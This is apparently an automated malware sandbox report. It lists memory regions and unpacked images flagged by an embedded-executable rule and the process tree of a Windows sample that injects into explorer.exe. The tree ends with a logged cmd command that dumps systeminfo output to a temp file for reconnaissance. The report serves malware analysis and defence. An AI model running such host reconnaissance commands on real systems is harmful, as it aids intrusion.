00000003.00000000.1534388387.02DE0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1536709172.03D80000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1536750248.03E20000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1535812569.035F0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1536757874.03E40000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1536809625.03EB0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1536825861.03EE0000.00000002.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1536800241.03EA0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1536870913.03F70000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1527805844.01A20000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1537045293.042C0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1536075349.03C30000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1536732103.03DE0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1536026873.03C20000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1535821910.03600000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1536791257.03E90000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1535957747.03B70000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1536833113.03EF0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000006.00000002.1659326612.001E0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000018.00000002.1694019901.000D0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
0000001D.00000002.1710546118.001A0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000022.00000002.1734565185.000D0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1538556444.05310000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A 0x601df:$mz: 4D 5A
0000000E.00000002.1686373712.000D0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1536262211.03CC0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000027.00000002.1736596250.000D0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1540736146.070E0000.00000002.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A 0x62f67:$mz: 4D 5A 0xc7b9f:$mz: 4D 5A 0xc8cc4:$mz: 4D 5A 0xfa22c:$mz: 4D 5A 0xfab23:$mz: 4D 5A 0xfb5e6:$mz: 4D 5A 0xfbcde:$mz: 4D 5A 0x11c4ef:$mz: 4D 5A 0x126750:$mz: 4D 5A 0x12eb59:$mz: 4D 5A 0x1305fb:$mz: 4D 5A 0x130a9c:$mz: 4D 5A 0x133cb4:$mz: 4D 5A 0x14d7f7:$mz: 4D 5A 0x1523e2:$mz: 4D 5A 0x15513b:$mz: 4D 5A 0x159cc0:$mz: 4D 5A 0x16837f:$mz: 4D 5A 0x242953:$mz: 4D 5A 0x26cf5a:$mz: 4D 5A
00000018.00000002.1694247399.00640000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
0000000E.00000002.1686572361.00470000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A

Unpacked PEs

Source	Rule	Description	Author	Strings
0.1.rb5iJg6pgN.exe.400000.0.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
0.2.rb5iJg6pgN.exe.400000.1.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
0.2.rb5iJg6pgN.exe.2d0000.0.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
0.2.rb5iJg6pgN.exe.2d0000.0.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
2.2.explorer.exe.60000.0.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
2.2.explorer.exe.60000.0.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
0.2.rb5iJg6pgN.exe.400000.1.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A 0x397e:$mz: 4D 5A 0xd153:$mz: 4D 5A 0xd7bc:$mz: 4D 5A 0x10689:$mz: 4D 5A 0x18ec8:$mz: 4D 5A 0x1b58d:$mz: 4D 5A 0x279fd:$mz: 4D 5A 0x2d459:$mz: 4D 5A 0x38abc:$mz: 4D 5A 0x38e42:$mz: 4D 5A 0x40fe9:$mz: 4D 5A 0x4b11e:$mz: 4D 5A
0.1.rb5iJg6pgN.exe.400000.0.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A 0x3507f:$mz: 4D 5A 0x3af37:$mz: 4D 5A 0x714ea:$mz: 4D 5A 0x7c1b0:$mz: 4D 5A 0xa1959:$mz: 4D 5A 0xa6c87:$mz: 4D 5A 0xaef58:$mz: 4D 5A 0xb47cc:$mz: 4D 5A 0xbcc42:$mz: 4D 5A 0xbf097:$mz: 4D 5A 0xcd2e5:$mz: 4D 5A 0xd1f91:$mz: 4D 5A
2.2.explorer.exe.650000.2.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
2.2.explorer.exe.650000.2.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
2.2.explorer.exe.630000.1.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
2.2.explorer.exe.630000.1.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.60000.0.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.60000.0.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.16f0000.2.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.16f0000.2.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.440000.1.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2d70000.13.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2de0000.14.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2de0000.14.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2e20000.15.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2e20000.15.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2e60000.17.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2e30000.16.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2e30000.16.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3020000.18.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3020000.18.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2e60000.17.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3080000.19.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3080000.19.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3140000.21.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3130000.20.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.1d70000.5.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3140000.21.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.35f0000.22.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3600000.23.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3600000.23.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.35f0000.22.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.1d30000.4.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3af0000.24.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3c20000.26.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3c30000.27.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3c20000.26.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3c30000.27.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3d80000.29.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3d80000.29.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3de0000.30.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3e20000.31.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3de0000.30.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3b70000.25.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.1d30000.4.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.1d70000.5.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.1da0000.6.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3ea0000.34.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3e90000.33.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3ea0000.34.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3eb0000.35.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3af0000.24.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3eb0000.35.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3ee0000.36.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3ee0000.36.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3ef0000.37.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3f70000.38.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3ef0000.37.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.4150000.39.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.4150000.39.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3f70000.38.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.42c0000.40.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.1a20000.3.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3e90000.33.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3e40000.32.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.60000.43.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.60000.43.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3e20000.31.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3b70000.25.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.16f0000.45.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.16f0000.45.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.42c0000.40.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.440000.44.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.1d70000.48.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.1d30000.47.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.1d30000.47.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.1d70000.48.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.1a20000.3.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.1da0000.6.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.1df0000.7.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.1df0000.7.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.1e00000.8.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.1e00000.8.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2020000.52.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.1e00000.51.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
0.0.rb5iJg6pgN.exe.400000.0.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A 0x3507f:$mz: 4D 5A 0x3af37:$mz: 4D 5A 0x714ea:$mz: 4D 5A 0x7c1b0:$mz: 4D 5A 0xa1959:$mz: 4D 5A 0xa6c87:$mz: 4D 5A 0xaef58:$mz: 4D 5A 0xb47cc:$mz: 4D 5A 0xbcc42:$mz: 4D 5A 0xbf097:$mz: 4D 5A 0xcd2e5:$mz: 4D 5A 0xd1f91:$mz: 4D 5A
3.0.explorer.exe.1da0000.49.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2ba0000.53.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2ba0000.53.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2bc0000.54.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2d40000.55.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2d40000.55.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2d70000.56.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2d70000.56.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2bc0000.54.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2de0000.57.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2de0000.57.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2e20000.58.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2e20000.58.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2e60000.60.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3020000.61.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.440000.44.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3020000.61.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3080000.62.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3130000.63.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2020000.9.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3080000.62.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3130000.63.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3140000.64.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.35f0000.65.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3600000.66.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3600000.66.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3af0000.67.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.1df0000.50.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3af0000.67.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
0.0.rb5iJg6pgN.exe.400000.0.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2ba0000.10.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2ba0000.10.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.70e0000.42.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A 0x62f67:$mz: 4D 5A 0xc7b9f:$mz: 4D 5A 0xc8cc4:$mz: 4D 5A 0xfa22c:$mz: 4D 5A 0xfab23:$mz: 4D 5A 0xfb5e6:$mz: 4D 5A 0xfbcde:$mz: 4D 5A 0x11c4ef:$mz: 4D 5A 0x126750:$mz: 4D 5A 0x12eb59:$mz: 4D 5A 0x1305fb:$mz: 4D 5A 0x130a9c:$mz: 4D 5A 0x133cb4:$mz: 4D 5A 0x14d7f7:$mz: 4D 5A 0x1523e2:$mz: 4D 5A 0x15513b:$mz: 4D 5A 0x159cc0:$mz: 4D 5A 0x16837f:$mz: 4D 5A 0x242953:$mz: 4D 5A 0x26cf5a:$mz: 4D 5A
3.0.explorer.exe.2d40000.12.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3d80000.72.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3d80000.72.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3b70000.68.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3c30000.70.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3c30000.70.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3c20000.69.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.1e00000.51.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3e20000.74.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3e20000.74.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3de0000.73.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3e40000.75.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3e40000.75.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3e90000.76.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3e90000.76.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2bc0000.11.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2bc0000.11.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2d40000.12.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2d70000.13.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.440000.1.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3eb0000.78.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3eb0000.78.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3ee0000.79.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.1a20000.46.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3ef0000.80.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3ef0000.80.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3f70000.81.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.42c0000.82.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.42c0000.82.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
6.2.systeminfo.exe.1e0000.0.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.1da0000.49.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
6.2.systeminfo.exe.1e0000.0.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3c20000.69.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3130000.20.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2020000.52.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3ea0000.77.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.35f0000.65.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
24.2.tasklist.exe.d0000.0.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2e60000.60.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3ea0000.77.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
29.2.driverquery.exe.1a0000.0.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
29.2.driverquery.exe.1a0000.0.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2e30000.59.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
34.2.reg.exe.d0000.0.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
34.2.reg.exe.d0000.0.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
39.2.reg.exe.d0000.0.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
39.2.reg.exe.d0000.0.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
24.2.tasklist.exe.d0000.0.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2020000.9.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3e40000.32.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.5310000.83.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A 0x601df:$mz: 4D 5A
3.0.explorer.exe.3140000.64.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3cc0000.28.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.1df0000.50.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3de0000.73.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
14.2.net.exe.d0000.0.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3f70000.81.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.2e30000.59.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
14.2.net.exe.d0000.0.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3b70000.68.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3ee0000.79.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.5310000.41.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A 0x601df:$mz: 4D 5A
3.0.explorer.exe.70e0000.84.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A 0x62f67:$mz: 4D 5A 0xc7b9f:$mz: 4D 5A 0xc8cc4:$mz: 4D 5A 0xfa22c:$mz: 4D 5A 0xfab23:$mz: 4D 5A 0xfb5e6:$mz: 4D 5A 0xfbcde:$mz: 4D 5A 0x11c4ef:$mz: 4D 5A 0x126750:$mz: 4D 5A 0x12eb59:$mz: 4D 5A 0x1305fb:$mz: 4D 5A 0x130a9c:$mz: 4D 5A 0x133cb4:$mz: 4D 5A 0x14d7f7:$mz: 4D 5A 0x1523e2:$mz: 4D 5A 0x15513b:$mz: 4D 5A 0x159cc0:$mz: 4D 5A 0x16837f:$mz: 4D 5A 0x242953:$mz: 4D 5A 0x26cf5a:$mz: 4D 5A
3.0.explorer.exe.1a20000.46.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3cc0000.71.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
14.2.net.exe.470000.1.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
14.2.net.exe.470000.1.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
3.0.explorer.exe.3cc0000.28.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A 0xbf200:$mz: 4D 5A
3.0.explorer.exe.5310000.83.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A 0x5f3df:$mz: 4D 5A 0xa07a0:$mz: 4D 5A 0xc3f48:$mz: 4D 5A 0xc5f38:$mz: 4D 5A 0x1184f0:$mz: 4D 5A 0x16fe24:$mz: 4D 5A 0x17afe7:$mz: 4D 5A 0x17e3e3:$mz: 4D 5A
3.0.explorer.exe.3cc0000.71.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A 0xbf200:$mz: 4D 5A
3.0.explorer.exe.5310000.41.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A 0x5f3df:$mz: 4D 5A 0xa07a0:$mz: 4D 5A 0xc3f48:$mz: 4D 5A 0xc5f38:$mz: 4D 5A 0x1184f0:$mz: 4D 5A 0x16fe24:$mz: 4D 5A 0x17afe7:$mz: 4D 5A 0x17e3e3:$mz: 4D 5A
24.2.tasklist.exe.640000.1.raw.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
24.2.tasklist.exe.640000.1.unpack	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Startup

System is w7_1

rb5iJg6pgN.exe (PID: 588 cmdline: 'C:\Users\user\Desktop\rb5iJg6pgN.exe' MD5: 879D9A2C75EE83443A0A913F5DC71B5C)

explorer.exe (PID: 2752 cmdline: C:\Windows\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

explorer.exe (PID: 3692 cmdline: C:\Windows\Explorer.EXE MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

cmd.exe (PID: 2764 cmdline: cmd /C 'systeminfo.exe > C:\Users\user~1\AppData\Local\Temp\C60A.bin1' MD5: AD7B9C14083B52BC532FBA5948342B98)

systeminfo.exe (PID: 3856 cmdline: systeminfo.exe MD5: 258B2ED54FC7F74E2FDCCE5861549C1A)

